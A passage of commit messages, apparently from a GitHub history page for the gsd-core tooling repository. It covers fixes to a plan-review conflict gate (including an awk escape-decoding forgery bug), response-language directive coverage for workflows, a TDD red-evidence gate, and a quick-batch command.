newline inside awk, splitting the appended record across two
physical lines. `tr` only strips actual control bytes, so it never
saw this — it defeated the exact forgery the gate exists to
prevent, both the reader's zero-count and the writer's own
idempotency check. Fixed by passing LINE/END through awk's
ENVIRON, which is not escape-decoded.
2. A conflict resolved and re-spawned within the same plan-phase
session was never flipped from `- [ ]` to `- [x]` — the record
channel bullet said "plan-phase closes it," but no step did. Only
a *separate* `--reviews` re-entry (line ~622, still prose-only)
closes conflicts; the in-session resolve path left them open
forever, permanently blocking convergence. Fixed by carrying the
just-written line in `PENDING_CONFLICT` and closing it in the
`Otherwise` branch before the checker re-spawns.
Also fixed a MAJOR: docs/COMMANDS.md described the `--max-cycles`
escalation gate as uniformly offering "proceed or review manually,"
but the code (this PR's own change) withholds "Proceed anyway"
specifically when a plan-revision conflict is open — only manual
review is offered in that case. Docs now say so.
Not applied: the reviewer's `\r` truncated to plain tr from a MINOR
that also asked for temp-file permission preservation across `mktemp`.
Applying `chmod --reference` is not portable to macOS/BSD `chmod`, so
this is left as a documented low-severity tradeoff — the temp file now
sits alongside REVIEWS.md (same filesystem, atomic `mv`), which was
the same finding's more substantive half. Also not applied: a
suggested `gsd_run review record-conflict` CLI subcommand to
deduplicate the two `awk` blocks — a new command plus wiring is out of
scope for a review-remediation fix.
tests/revision-remediation-binding.test.cjs adds regression coverage
for both BLOCKERs: a literal-backslash-n hostile field composed with
the reader gate, and a close-gate extraction that verifies the flip to
`[x]`, the reader's count dropping to 0, and a fail-closed path when
the pending line is missing.
Emitted-Drift-Ack-Growth: plan-phase.md — #3916 fixes an awk -v escape-
decoding forgery and adds the missing same-session conflict-close step
an adversarial review found in the writer-side gate
* chore(#3916): backfill changeset pr field to the upstream PR number
Fork-validation CI needed pr: 1 to pass its own changeset-lint; restore
pr: 3916 before this push reaches open-gsd/gsd-core.
* fix(#3771): trim plan-phase.md prose back under the XL byte cap
Merging origin/next's unrelated growth pushed plan-phase.md 473 bytes
past the workflow-size-budget XL cap and the ADR-857 phase-6 baseline,
both tripped by CI after review approval. Removed an unpinned inert
bash comment and tightened connective prose in three REVISION_CONFLICT
bullets; no executable shell or test-pinned substring changed.
* chore(rehearsal): pin changeset pr field to fork rehearsal PR #25
Scratch-only commit for the rehearsal branch's own CI. Will not be
carried onto the branch backing upstream #3916 — that keeps pr: 3916.
* fix(#3771): address CodeRabbit findings on the REVISION_CONFLICT protocol
Fork rehearsal PR #25's first CodeRabbit pass surfaced 7 findings against
the already-approved #3916 diff; each verified against current code
before fixing (none hallucinated):
- plan-phase.md: writer-side awk gates now strip a trailing \r before
comparing lines, matching the reader gate (plan-review-convergence.md)
-- a CRLF REVIEWS.md previously made both writer gates fail closed.
- plan-phase.md: the close-fence's REVIEWS_FILE/PENDING_CONFLICT/
CONFLICT_RESOLUTION were read without ever being (re)defined in that
fence -- shell state does not survive across separate fenced blocks
(same convention already documented in review.md). Added the explicit
recompute/set instruction.
- revision-loop.md: previous_conflict_property was never reset after a
normal (non-conflict) revision, so a later, unrelated conflict on the
same property could be misread as a repeat and escalate prematurely.
- gsd-plan-checker.md / few-shot-examples/plan-checker.md: two example
required_property strings were unconditionally binding in a way their
own dimension's rules aren't (no-analog RESEARCH.md fallback; tasks
that create no functions), now scoped to match.
- quick/steps/plan-checker-loop.md: added the same disjoint
"Otherwise (not REVISION_CONFLICT)" branch plan-phase.md already had,
closing an ambiguity between the conflict and non-conflict return paths.
- revision-remediation-binding.test.cjs: the REVIEWS_PATH init-order
assertion used indexOf() without checking for -1, so it would pass
vacuously if either anchor were renamed away.
Also restores an "Export the row's CONFLICT_*" instruction I had cut in
the prior byte-budget trim -- checked non-pinned by tests, but it was the
only text telling the agent to set those vars before the awk block reads
them via ENVIRON.
Net growth from these fixes required reclaiming bytes elsewhere in
plan-phase.md (verified against every pinned substring in
revision-remediation-binding.test.cjs) to stay under the XL tier's
hard 98304-byte cap; final size 98245 bytes.
* fix(#3771): resync the #4079 shrink-only mirror to the current PRE_PHASE6 line
tests/plan-phase-background-wait-wakeup.test.cjs (landed on next via an
unrelated #4079 PR, merged in by this branch's next-sync) mirrored
plan-phase.md's phase6 shrink-only ceiling as a hardcoded local constant
(94519) rather than reading tests/phase6-capstone-conformance.test.cjs's
PRE_PHASE6 value. That value has since been legitimately raised twice
during this PR's own review (94519 -> 96700 -> 98300) to accommodate the
REVISION_CONFLICT persistence/routing gate. The two branches' independent
histories left the mirror stale post-merge -- not a textual git conflict,
but the same class of thing. Resynced to 98300.
* fix(#3771): address round-2 CodeRabbit findings on the conflict gates
CodeRabbit's re-review of the previous remediation commit found two real
issues in what it had already flagged:
- Both writer-side awk CRLF fixes used \`sub(/\r$/, "")\` directly on \`\$0\`,
which mutates it in place -- \`{ print }\` then emitted the CR-stripped
copy for every passed-through line, silently rewriting an unrelated
CRLF REVIEWS.md to LF on any insert or close. Now compares against a
separate \`cur\` copy and prints the original, untouched \`\$0\`.
- The close-fence's "recompute REVIEWS_FILE/PENDING_CONFLICT" prose
implied in-fence derivation, but the fence has no such code and the
test harness (\`runCloseGate\`) deliberately supplies all three as
pre-set env vars -- matching how the open fence's "Export the row's
CONFLICT_*" instruction already works. Reworded to "export ... in the
same invocation", matching that established, test-verified pattern
instead of promising logic that isn't there.
Added a regression test proving the CRLF fix no longer touches
passthrough lines (red against the mutate-in-place version, green now).
* fix(#3771): use a CRLF-safe check in the new passthrough regression test
local/no-crlf-fragile-split forbids splitting readFileSync content on a
literal \n (Windows git-autocrlf checkouts yield \r\n). My CRLF
passthrough-preservation test from the previous commit did exactly that
to inspect the first line. Replaced with a direct startsWith() check
against the known CRLF-terminated header, which needs no split.
* test(#3771): assert the record itself is inserted in the CRLF passthrough test
CodeRabbit nitpick (round 3): the passthrough-preservation test checked
gate status and the pre-existing line's CRLF ending, but never asserted
the new REVISION_CONFLICT record was actually written.
* fix(#3771): address agy/gemini-3.8-flash-high adversarial review findings
Full-PR adversarial review (internal /gsd-review antigravity lane,
gemini-3.8-flash-high) surfaced 9 findings; each verified against current
code before fixing (none hallucinated):
HIGH:
- quick-batch/steps/plan-checker-loop.md never received the
required_property/fix_hint binding language or REVISION_CONFLICT
handling this PR added everywhere else -- a genuinely unmigrated
producing context. Migrated to match quick/steps/plan-checker-loop.md,
and added it to the ORCHESTRATORS consistency battery in
revision-remediation-binding.test.cjs so future drift is caught
automatically.
- The close-fence's PENDING_CONFLICT was an agent-supplied env var that
had to exactly reconstruct a five-field sanitized line across a
multi-minute subagent dispatch -- fragile, and a scalar var also meant
a second simultaneous conflict silently dropped the first on overwrite.
Redesigned to match the open conflict by CONFLICT_DIMENSION/
CONFLICT_PLAN identity instead: the agent re-supplies two short,
already-tracked identifiers rather than reconstructing the full
sanitized text, and each conflict resolves independently regardless of
how many are open. Updated the test harness's runCloseGate contract to
match, and added a two-open-conflicts regression test.
MEDIUM:
- plan-phase.md's `--reviews` replanning path told the reader to "flip
the matching line to [x]" in prose only, with no executable path to
it -- pointed it at the same close gate used in step 12.
- plan-review-convergence.md's reader-gate awk tolerated a blank line
before the opening delimiter but not before the heading that follows
it; a formatter or LLM writer inserting one would hard-abort
convergence on an otherwise well-formed REVIEWS.md. Added the same
tolerance already granted above it, with a regression test.
LOW:
- Clarified that the escalation destination for a stalled conflict is
the same iteration/revision-count cap gate already defined in each of
quick, quick-batch, ui-phase, and verify-work, rather than an
undefined "stall" concept.
- Clarified "twice in a row" means no successful revision intervened,
matching revision-loop.md's now-explicit previous_conflict_property
reset.
- Fixed gsd-ui-researcher.md's stale rationale text, copied verbatim
from planner-revision.md: ui-phase presents the conflict table
directly to the user, it does not persist to a shared file scanned by
heading.
Net growth again required reclaiming bytes in plan-phase.md (verified
against every pinned substring in revision-remediation-binding.test.cjs)
to stay under the XL tier's hard 98304-byte cap; removed a now-dead
PENDING_CONFLICT assignment in the process. Final size 98258 bytes.
* fix(#3771): scope row 48's quick/steps guard away from plan-checker-loop.md
tests/gsd-quick-batch-quick-regression.test.cjs's row 48 (#3676) flagged
this branch's quick-batch/steps/plan-checker-loop.md migration (the agy
HIGH finding) as a violation, because it also edits
quick/steps/plan-checker-loop.md for the same underlying #3771 protocol
fix.
Verified against git history before scoping:
|
||
|
|
eedb6b5431 |
enhance(#4107): sequence external review after internal fixes (#4206)
* enhance(#4107): sequence external review after internal fixes Teach the planner to finish internal review and accepted fixes before opening a PR known to trigger automatic external review. If an open-time property exists, re-check it immediately before opening with nothing intervening; post-open CI, review, changeset, and tracking work may follow. Emitted-Drift-Ack-Growth: gsd-planner.md — issue #4107 adds the review-before-publish ordering rule * chore(#4107): add PR #11 changeset * chore(changeset): link upstream PR 4206 * fix(#4107): ground external-review terms and tighten ordering test Addresses trek-e review on PR #4206: - Ground 'known automatic external review' and 'open-time property' with concrete anchors (CodeRabbit App / .coderabbit.yaml, not-behind-base). - Suffix the antipatterns heading with (#4107), matching sibling sections. - Replace vacuous negative assertion with inverted-order fixtures that prove the ordering regexes reject bad phrasing, not just co-occurrence. * fix(#4107): make directionality fixtures genuinely adversarial agy (gemini-3.8-flash-high) adversarial review found the two negative fixtures added in 584ec1cda were vacuous: they proved the ordering regexes require certain keywords, not that they reject inverted order — the bad strings simply omitted required tokens rather than reordering them. - Rebuild both fixtures to contain every required token, reordered/negated, so a real reordering would still slip past a weaker regex. - Drop the unsupported 'changeset' mention from the Wave 4+ antipatterns example — gsd-core/workflows/ship.md never references changeset work, so naming it here implied a step this rule doesn't actually govern. * fix(#4107): make the full review-then-fix-then-open sequence explicit CodeRabbit (fork PR #11) flagged that the planner prose only ordered accepted fixes before PR open, without explicitly naming 'run internal review' as its own earlier step, and that no fixture tested the planner text's own wording for inversion (only the antipatterns example had one). - Prose now reads 'run internal review and apply the accepted internal-review fixes before the final open'. - Added a planner-text-specific inverted-order fixture alongside the existing antipatterns-example one. --------- Co-authored-by: Test <test@test.com> Co-authored-by: Tom Boucher <trekkie@nomorestars.com> |
||
|
|
0fca71eaae |
enhance(#2529): cover every workflow with response-language directives + CI lint (#2558)
* enhance(#2529): cover every workflow with response-language directives + CI lint Every workflow now carries response-language coverage in one of three forms, and a CI lint keeps it that way. - 43 workflows load the new shared reference, `gsd-core/references/response-language-directive.md`, by eager `@`-import. - Lazy-loaded modes/steps/templates, which cannot rely on an eager import, carry an exact inline directive; 35 such paths are pinned by exact path. - Fragments dispatched by a covered parent inherit coverage, proven per file rather than granted per directory. The 45 workflows whose directive covered only "questions, prompts, and explanations" now name inter-tool narration, which is the defect #2529 reports: the running commentary between tool calls stayed English while the answers around it were translated. `scripts/lint-response-language-coverage.cjs` enforces it and fails closed on three independent discovery failures (unreadable catalog, empty catalog, unfollowed symlink). It resolves which reference a workflow imports and applies the same four-predicate test to that file, so a weakened shared reference uncovers its importers instead of passing silently, reported once as a systemic failure rather than 43 times. The walk follows symlinked subtrees with a realpath cycle bound. `lint:ci` invokes it by name. REQ-LANG-03 and REQ-LANG-04 state the contract in docs/FEATURES.md; REQ-LANG-04 names the two forms that satisfy it ("narration", "between tool calls") rather than enumerating class members an author cannot use verbatim, and a test pins that text to what the matcher accepts. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * chore(#2529): register the coverage test in the docs-guard lane `107eb8c1` (#3787) landed the docs-guard lane on `next` while this PR was open: a test that reads a `docs/` path must be named in `scripts/docs-guard-registry.cjs` or carry a `docs-guard-exempt` marker, so the guards that read a doc run on the PR that changes it. `tests/response-language-coverage.test.cjs` reads `docs/FEATURES.md` -- it extracts every form REQ-LANG-04 offers an author and runs each through the matcher that enforces it. Registration, not exemption, is the correct side of that gate: a reword of the requirement with no code change is precisely the diff this test exists to catch, and it is the diff the lane would otherwise skip. Registered narrowly (`['docs/FEATURES.md']`) rather than with the `'*'` sentinel, so an unrelated docs change does not pull this test into the lane. Verified: lint-docs-guard-registration 0 violations, tests/ci-docs-guard-registry.test.cjs 51/51, lint:ci exit 0. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * chore(#2529): consolidate this PR's emitted-growth acks into its own fragment This PR ripples emitted bytes across 85 workflow paths. Until now each ripple was acknowledged by appending to whichever live fragment owned that path, because two ack sources may never name the same path. `a84f7563` (#3078) swept all 45 fully-spent fragments off `next`. Forty-two of the paths this PR grows were owned by swept fragments, so those keys are now unowned and this PR's own fragment declares them directly -- one path, one source, and no dependence on a fragment that no longer exists. Each adopted entry keeps its measurement and records where it came from. Two paths are handled differently, because the sweep did not free them: - `review.md` is now owned by `3034-parallel-reviewer-lanes.json`, which landed on `next` after the sweep. Its entry is live, so the old route still applies: this PR's note is appended to that entry rather than declared a second time. - `plan-review-convergence.md` keeps the arrangement made in round 24. Result: 3 fragments in the directory, 85 keys in this PR's own, 0 cross-source duplicates. `lint-emitted-drift-ack` exit 0, `tests/emitted-attribution.test.cjs` green. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#2529): move REQ-LANG-03/04 into the feature fragment that now generates them `36375513` (#3845) made docs/FEATURES.md a generated projection of docs/features/*.md, marked "do not edit by hand". This PR wrote REQ-LANG-03 and REQ-LANG-04 straight into the generated file, so the rebase left the requirement present in the projection and absent from its source -- the next regeneration would have deleted both, and `tests/features-index-gate.test.cjs` was already red on the mismatch. Both requirements now live in docs/features/response-language-config.md alongside REQ-LANG-01 and -02. Regenerating produces a docs/FEATURES.md that is byte-identical to the committed one, so the text this PR shipped is unchanged -- only its source of truth moved to where #3840 put it. The docs-guard registration is widened to name the fragment as well as the projection. The requirement's source is the fragment now, and an edit there that skips regeneration would otherwise reach this guard through neither path. Verified: features-index-gate 68/68, lint-docs-guard-registration 0 violations, ci-docs-guard-registry + response-language-coverage 142/142. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * chore(#2529): hand the plan-phase ack back to its new live owner `c933184b` (#3825) landed `3172-stated-failing-direction.json` on `next` after fragment had adopted that path when the sweep left it unowned, so the merged tree named it from two sources -- a hard failure in `scripts/lint-emitted-drift-ack.cjs`. The path has a live owner again, so the append route applies: this PR's note joins that entry, carrying its own measurement, and the key is dropped from this PR's fragment (84 keys left, the others untouched). The provenance sentence written for the swept-fragment case is removed rather than reused -- this path was never orphaned, so that account of it would be false. Same shape as `review.md` and `plan-review-convergence.md`: ownership is a property of the merged tree, and a fragment landing upstream after a push can reclaim a key no local check would have flagged. Verified: lint-emitted-drift-ack exit 0, lint:ci exit 0. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#2529): state byte figures that are true against the tree The reference claimed `execute-phase.md` has "2 bytes of headroom under the ceiling named below". That was true when the sentence was written -- the file sat at 93398 against the 93400 comfort assert -- and upstream has since shrunk it to 91493 against a 93600 hard ceiling, so the figure now understates the headroom by three orders of magnitude. The rationale the sentence supports does not depend on the number, so the number is gone rather than refreshed: a restated figure would go stale again on the next upstream edit, and nothing parses it. Audited every other numeric claim this PR ships the same way, mechanically against the merge base: all 82 FILE-delta claims in the ack fragment match the real per-file delta exactly, and the 1,629-byte reference and 63-byte import line check out. One class was imprecise: the 41 notes for workflows whose inline directive was rewritten in place quoted the conversion counterfactual as "+1,692 bytes more loaded context", which is the reference form's whole weight, not the increase over the inline directive those files already carry. Each now names both quantities and the net (+1,605 / +1,609 / +1,584). Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#2529): one rule for pinned vs inherited coverage, and the docs to pick it Review measured that 14 of the 35 pinned fragments would pass by inheritance anyway, and that the PR asserted both readings at once: inheritance is real coverage (so those 14 pins are noise) or it is not (so 30 inheriting fragments are green-but-uncovered). Only one can be true. Inheritance is real: the predicate proves it per file -- the parent must dispatch this exact path from a read/execute context AND be covered itself -- so the parent's directive is in the loaded context by the time the fragment is read. The 14 pins are therefore removed along with the directive lines they pinned, and those files inherit like the 30 structurally identical ones. The rule is now stated where the set is declared, and enforced from the other side by a test: no member of the pinned set may be one that would have inherited. That is what decides the form for the next fragment. - pinned set 35 -> 21; 14 workflow files revert to their base content - `findViolations` no longer returns early on a pinned path: a file that becomes eagerly loaded and takes the shared reference is strictly better off, and the gate must not red that. The reference form is admitted because its own wording is validated in turn; an arbitrary reworded inline line still fails. - the reference-directive cache is keyed by size and mtime, not by path alone, so a rewritten reference re-asked in one process no longer returns the stale verdict - `carriesInlineDirective` names its negation blindness: four independent hits read vocabulary, not polarity - the real-tree scan asserts each source produced files instead of `> 152`, a constant that read as the workflow count and would have passed a scan that lost one of its two directories - the pinned-set size assertion goes the same way: the size follows from the rule, so the rule is what the suite asserts Docs, for the gate that now governs every future workflow: - `docs/contributing/response-language-coverage.md` -- why the narration class is the discriminator, the four coverage forms, the decision order that picks one, the pinned line, and what each failure message means - a row in CONTRIBUTING.md's CI checks table, matching the docs-guard row - `docs/CONFIGURATION.md` points at it from the `response_language` entry Also: the changeset said 45 reworded workflows; it is 44 (42 @-reference + 21 pinned + 44 rewritten = 107 touched). That text ships to CHANGELOG.md. `3707-parse-gap-reporting.json` landed on `next` reclaiming `audit-uat.md` and `progress.md`; both handed back by the append route, leaving 82 keys here. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#2529): correct the reference-taker count, 43 -> 42 The ack notes said the import line is byte-identical "in each of the 43 workflows that take the reference" and that the alternative would be "43 inline copies". The shared reference has 42 importers; the 43rd file in review's table is `execute-phase.md`, which imports the OTHER reference. Corrected in all 41 notes that carry the sentence, across this PR's fragment and the two it appends to. Found by re-running the numeric audit from the previous round after the rebase, which also re-verified all 84 FILE-delta claims against the new base -- all exact. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * chore(#2529): migrate the emitted-drift ack from a fragment to commit trailers ADR-3942 (#3954) landed while this PR was open: the acknowledgment is now a commit trailer and tests/emitted-drift-acks/ no longer exists. The fragment is deleted and each key it declared becomes one trailer, reasons unchanged. The four keys this PR had handed to 3034-*, 3172-* and 3707-* under the one-source rule come home here. That rule was the whole reason for the hand-backs, and the trailer model has no shared namespace to collide in -- five of this PR's rounds were spent on exactly those collisions. Emitted-Drift-Ack-Growth: add-backlog.md — #2529 — RESTATED in round 10, superseding this PR's earlier "+63 bytes, prose only" wording, which reported a file delta as if it were the whole cost. The workflow gains the shared response-language directive as a single `@`-reference line. FILE delta: +63 bytes, byte-identical in each of the 42 workflows that take the reference. LOADED-CONTEXT delta: +1,692 bytes per workflow — the 63-byte import line plus the 1,629 bytes of `gsd-core/references/response-language-directive.md`, because an `@`-import in this repo is EAGER (ADR-1610 Decision point 4; docs/ARCHITECTURE.md: moving prose into a file that is still eagerly `@`-imported "shrinks the measured file without shrinking loaded context"). The repo's size gates — the tier hard caps in `tests/workflow-size-budget.test.cjs` and this size ratchet — measure the FILE, not the transitive inline, so they see 63 of those 1,692 bytes; the remaining 1,629 are declared here because no gate reads them. The eager import is accepted on its merits, not hidden: 42 inline copies would be 43 places for the wording to drift, and the reference is the one place it is maintained. Prose only: no step, gate, tool invocation, or subagent dispatch shape changed. Emitted-Drift-Ack-Growth: add-phase.md — #2529 — RESTATED in round 10, superseding this PR's earlier "+63 bytes, prose only" wording, which reported a file delta as if it were the whole cost. The workflow gains the shared response-language directive as a single `@`-reference line. FILE delta: +63 bytes, byte-identical in each of the 42 workflows that take the reference. LOADED-CONTEXT delta: +1,692 bytes per workflow — the 63-byte import line plus the 1,629 bytes of `gsd-core/references/response-language-directive.md`, because an `@`-import in this repo is EAGER (ADR-1610 Decision point 4; docs/ARCHITECTURE.md: moving prose into a file that is still eagerly `@`-imported "shrinks the measured file without shrinking loaded context"). The repo's size gates — the tier hard caps in `tests/workflow-size-budget.test.cjs` and this size ratchet — measure the FILE, not the transitive inline, so they see 63 of those 1,692 bytes; the remaining 1,629 are declared here because no gate reads them. The eager import is accepted on its merits, not hidden: 42 inline copies would be 43 places for the wording to drift, and the reference is the one place it is maintained. Prose only: no step, gate, tool invocation, or subagent dispatch shape changed. Emitted-Drift-Ack-Growth: add-tests.md — #2529 MAJOR 1 (round 10): the workflow's pre-existing inline response-language directive is rewritten IN PLACE so the sentence names inter-tool NARRATION explicitly — narration between tool calls, status updates, progress notes, findings — instead of only "questions, prompts, and explanations". That older wording is the defect #2529 reports (it leaves the running commentary between tool calls in English while the answers around it are translated), and `scripts/lint-response-language-coverage.cjs` had been certifying it as coverage, so the gate legitimised the bug. +87 bytes, prose only: no step, gate, tool invocation, or subagent dispatch shape changed. FILE delta and LOADED-CONTEXT delta are both +87 here, and that identity is the point — the directive was deliberately NOT converted to an `@`-reference, because an `@`-import in this repo is EAGER (ADR-1610 Decision point 4; docs/ARCHITECTURE.md: moving prose into a file that is still eagerly `@`-imported "shrinks the measured file without shrinking loaded context"), so the conversion would have bought a smaller measured file at a cost of 1,692 bytes of loaded context per workflow — the 63-byte import line plus the 1,629-byte reference — against the 87 bytes this inline directive costs, a net +1,605. Stated plainly because the gates cannot state it: the repo's size gates — the tier hard caps in `tests/workflow-size-budget.test.cjs` and this size ratchet — measure the FILE, not the transitive inline, so an `@`-reference conversion would have READ as a smaller change to every gate in the repo while costing 1,605 bytes more loaded context per invocation. Emitted-Drift-Ack-Growth: add-todo.md — #2529 MAJOR 1 (round 10): the workflow's pre-existing inline response-language directive is rewritten IN PLACE so the sentence names inter-tool NARRATION explicitly — narration between tool calls, status updates, progress notes, findings — instead of only "questions, prompts, and explanations". That older wording is the defect #2529 reports (it leaves the running commentary between tool calls in English while the answers around it are translated), and `scripts/lint-response-language-coverage.cjs` had been certifying it as coverage, so the gate legitimised the bug. +87 bytes, prose only: no step, gate, tool invocation, or subagent dispatch shape changed. FILE delta and LOADED-CONTEXT delta are both +87 here, and that identity is the point — the directive was deliberately NOT converted to an `@`-reference, because an `@`-import in this repo is EAGER (ADR-1610 Decision point 4; docs/ARCHITECTURE.md: moving prose into a file that is still eagerly `@`-imported "shrinks the measured file without shrinking loaded context"), so the conversion would have bought a smaller measured file at a cost of 1,692 bytes of loaded context per workflow — the 63-byte import line plus the 1,629-byte reference — against the 87 bytes this inline directive costs, a net +1,605. Stated plainly because the gates cannot state it: the repo's size gates — the tier hard caps in `tests/workflow-size-budget.test.cjs` and this size ratchet — measure the FILE, not the transitive inline, so an `@`-reference conversion would have READ as a smaller change to every gate in the repo while costing 1,605 bytes more loaded context per invocation. Emitted-Drift-Ack-Growth: ai-integration-phase.md — #2529 MAJOR 1 (round 10): the workflow's pre-existing inline response-language directive is rewritten IN PLACE so the sentence names inter-tool NARRATION explicitly — narration between tool calls, status updates, progress notes, findings — instead of only "questions, prompts, and explanations". That older wording is the defect #2529 reports (it leaves the running commentary between tool calls in English while the answers around it are translated), and `scripts/lint-response-language-coverage.cjs` had been certifying it as coverage, so the gate legitimised the bug. +87 bytes, prose only: no step, gate, tool invocation, or subagent dispatch shape changed. FILE delta and LOADED-CONTEXT delta are both +87 here, and that identity is the point — the directive was deliberately NOT converted to an `@`-reference, because an `@`-import in this repo is EAGER (ADR-1610 Decision point 4; docs/ARCHITECTURE.md: moving prose into a file that is still eagerly `@`-imported "shrinks the measured file without shrinking loaded context"), so the conversion would have bought a smaller measured file at a cost of 1,692 bytes of loaded context per workflow — the 63-byte import line plus the 1,629-byte reference — against the 87 bytes this inline directive costs, a net +1,605. Stated plainly because the gates cannot state it: the repo's size gates — the tier hard caps in `tests/workflow-size-budget.test.cjs` and this size ratchet — measure the FILE, not the transitive inline, so an `@`-reference conversion would have READ as a smaller change to every gate in the repo while costing 1,605 bytes more loaded context per invocation. Re-homed in round 16: the fragment that carried this sentence (`3423-required-reading.json`) was retired on `next` by |
||
|
|
8249ebcf6e |
fix(#3770): require intentional RED evidence before GREEN (#4279)
* test(3770): add failing tests for intentional RED evidence gate RED: classifyRedEvidence / buildRedEvidenceRecord / check tdd-red-evidence do not exist yet; every row fails on require. Per #3770 only an intentional target-test failure may authorize GREEN; zero-test discovery, fixture crashes, unrelated failures, and unexpected green are INVALID_RED. * fix(3770): require intentional RED evidence before GREEN Only an intentional failure of the TARGET test (distinctly named, TAP-reported assertion failure) classifies as RED_EVIDENCE_OK and authorizes GREEN. Zero-test discovery, fixture/load crashes (file-named failures), nonzero exits without a failing test, unrelated failures, unexpected greens, and malformed/missing records are INVALID_RED and block GREEN. - src/tdd-red-evidence.cts: pure classifier + persisted record builder (reuses the prohibition-enforcement TAP primitives; fail-closed, never throws) - check tdd-red-evidence <record.json>: validates the persisted record (command, exit code, failing test, expected, actual) - gsd-executor.md / references/tdd.md / references/execute-mvp-tdd.md: RED now requires the evidence record + gate verdict, not a nonzero exit or a RED: tag * chore(3770): regenerate inventory manifest for tdd-red-evidence.cjs * fix(3770): fit executor fail-fast under size cap, fix unrelated-failure fixture, ignore generated lib - gsd-executor.md: compress the #3770 fail-fast rule to one line (49149 B < 49152 cap; line-count parity keeps the #2751 PROSE_ALLOWLIST line 816 valid) - tests: the row-6 fixture used String.replace (first-occurrence), so the `not ok` line still named the target test and the classifier was right to accept it; replaceAll makes the failure genuinely unrelated - eslint.config.mjs: ignore tsc-generated bin/lib/tdd-red-evidence.cjs (lint the src/*.cts source, per ADR-457 migration rule) Emitted-Drift-Ack-Growth: gsd-executor.md — the #3770 fail-fast rule now requires intentional RED evidence (check tdd-red-evidence) before GREEN; +172 bytes, kept under the LARGE cap and on one line * chore(3770): add changeset * chore(3770): backfill PR number in changeset --------- Co-authored-by: sim <sim@local> |
||
|
|
2f64e6230a |
feat(#3676): quick-batch command, workflow, and isolation integration (#4212)
* test(#3676): add failing tests for quick-batch dispatch core Failing-first tests for Phase 4 of epic #3344 (ADR-1239 "Quick-batch binding"): quick-batch-dispatch.test.cjs / .property.test.cjs cover the new pure decision-logic module (arg validation, effective concurrency, deterministic merge order, spawn backpressure, verification/merge routing, cleanup-entry construction — design doc rows 3-15,24,26-28, 30-36,39; property rows 51-53). quick-batch-update-items.test.cjs covers the new updateBatchItems export on src/quick-batch.cts (rows 15,22-23, including the negative cycle-rejection case). quick-batch-command-router.test.cjs covers the new gsd-tools quick-batch CLI family (rows 46-47). These reference modules/ exports that do not exist yet. * feat(#3676): implement quick-batch dispatch core, updateBatchItems, and command router Phase 4 of epic #3344 (ADR-1239 "Quick-batch binding") CORE decision layer — CLI verbs and pure orchestration logic only; no workflow markdown, no Agent()/git-worktree I/O. - src/quick-batch-dispatch.cts (new): pure decision functions consumed by the (separate, follow-up) /gsd:quick-batch workflow markdown — parseQuickBatchArgs, computeEffectiveConcurrency, computeMergeOrder, computeSpawnPlan, routeVerificationOutcome, routeMergeOutcome, buildCleanupManifestEntry (the last parses caller-supplied plan text via the existing parsePlanDocument; no filesystem access). - src/quick-batch.cts: adds updateBatchItems, resolving the design doc's Open Question 1 as ONE additive export on this module instead of the second, independent BATCH.json writer the design doc originally proposed. Reuses the same withPlanningLock transaction shape, computeWaves, and platformWriteSync call resumeBatch/ completeQuickItem already use; fails closed without persisting on an unknown item, an unknown/self dependency, or an introduced cycle. - src/quick-batch-command-router.cts (new): gsd-tools quick-batch CLI family, wired into HOST_COMMAND_ROUTERS (gsd-core/bin/gsd-tools.cjs) as a first-party always-on command (like /gsd:quick), not the opt-in capability-registry path graphify uses. Verbs: create/update/resume/ complete (wrap quick-batch.cts) and effective-concurrency/ merge-eligible/spawn-plan/verification-routing/merge-routing/ cleanup-entry/parse-args (wrap quick-batch-dispatch.cts). Design doc rows covered: 3-15, 22-24, 26-28, 30-39, 46-47. Property rows 51-53. Rows covering workflow markdown / Agent() dispatch / `git worktree` behavior (16-21, 25, 29, 40-45, 48-50) remain for the follow-up markdown-authoring pass, per the phase brief's explicit scope boundary. * docs(#3676): register quick-batch-dispatch/command-router modules in bookkeeping surfaces New-.cts-module ripple for the two Phase 4 modules (epic #3344, ADR-1239 "Quick-batch binding"): .gitignore (compiled .cjs artifacts, ADR-457 build-at-publish), eslint.config.mjs (lint the .cts source, not the emitted .cjs), docs/INVENTORY.md + docs/INVENTORY-MANIFEST.json (via `node scripts/gen-inventory-manifest.cjs --write`, after `npm run build:lib`), and CONTEXT.md glossary entries for "Quick-Batch Dispatch Core Module" and "Quick-Batch Command Router Module", plus an update to the existing "Quick-Batch Core Primitives Module" entry documenting the new updateBatchItems export. * test(#3676): fold updateBatchItems tests into quick-batch.test.cjs (fix lint-test-file-count) scripts/lint-test-file-count.cjs buckets any quick-batch-*.test.cjs file under the quick-batch production module by longest-prefix match, and that module is already at its 2-file cap (quick-batch.test.cjs + quick-batch.property.test.cjs). The standalone tests/quick-batch-update-items.test.cjs added in the prior commit pushed it to 3 and failed `npm run lint:ci`. Fold its content into quick-batch.test.cjs (append-only — no existing test in that file is modified) and update the CONTEXT.md glossary reference to match. Surfaced while re-running `GITHUB_BASE_REF=next npm run lint:ci` after `npm ci` (this worktree previously had no local node_modules, which also made gen-scripts-cli-exit/gen-hooks-cli-exit/gen-exit-code-* unable to resolve typescript — resolved by npm ci, no code change needed there). `npm run lint:ci` and `npx tsc -p tsconfig.build.json --noEmit` are both green after this fix. * test(#3676): add failing tests for the quick-batch command/workflow markdown Failing-first tests for Phase 4's markdown-authoring pass (epic #3344, ADR-1239 "Quick-batch binding"): gsd-quick-batch-workflow.test.cjs covers commands/gsd/quick-batch.md's frontmatter/objective/process, gsd-core/workflows/quick-batch.md's byte-size boundary (row 49, ADR 1610 NEW_FILE_CAP) and step-fragment count, the isolation model (rows 20-22), the executor single-writer invariant (row 18), merge validation reusing the existing bounded primitive (row 25), the optional research/plan-checker/verification leaves (rows 16,17,19, 30,31), planning-failure blocking execution (row 29), the submodule guard (rows 36,44), and the new agents/gsd-planner.md quick-batch mode (rows 13-15). gsd-quick-batch-quick-regression.test.cjs covers row 48 (ordinary /gsd:quick stays byte-identical). Named `gsd-quick-batch-*` (not `quick-batch-*`) so lint-test-file-count's longest-prefix bucketing doesn't fold these markdown-only tests into the already-capped quick-batch/quick-batch-dispatch/ 